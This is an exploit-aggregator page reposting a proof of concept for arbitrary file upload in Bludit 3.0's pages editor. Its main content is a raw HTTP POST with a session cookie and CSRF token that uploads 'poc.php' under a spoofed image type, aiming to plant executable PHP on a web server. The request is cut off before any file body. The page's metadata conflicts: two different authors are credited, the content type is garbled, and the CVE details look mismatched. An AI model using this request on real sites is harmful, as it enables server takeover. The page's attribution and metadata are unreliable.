Advertisement






Bludit Pages Editor 3.0 - Arbitrary File Upload

CVE Category Price Severity
CVE-2019-17240 CWE-434 $5000 High
Author Risk Exploitation Type Date
EgiX High Remote 2019-01-02
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010018

Below is a copy:

Bludit Pages Editor 3.0 - Arbitrary File Upload
Exploit Title: bludit Pages Editor 3.0.0 - Arbitrary File Upload 
Exploit Author: The Mechiavellian
Exploit Author Facebook : facebook.com/TheMachiavellian/
Vendor Homepage || software link : https://www.bludit.com/
Version: 3.0
Tested on: Win7_X64

>>Proof Of Concept
POST /admin/ajax/upload-files HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip
X-Requested-With: XMLHttpRequest (ajax js)
Referer: http://localhost/admin/new-content
Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9

 
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="tokenCSRF"
 
67987ea926223b28949695d6936191d28d320f20
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
Content-Type: .pnj .jpg


for more follow me on :
 facebook.com/TheMachiavellian/

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum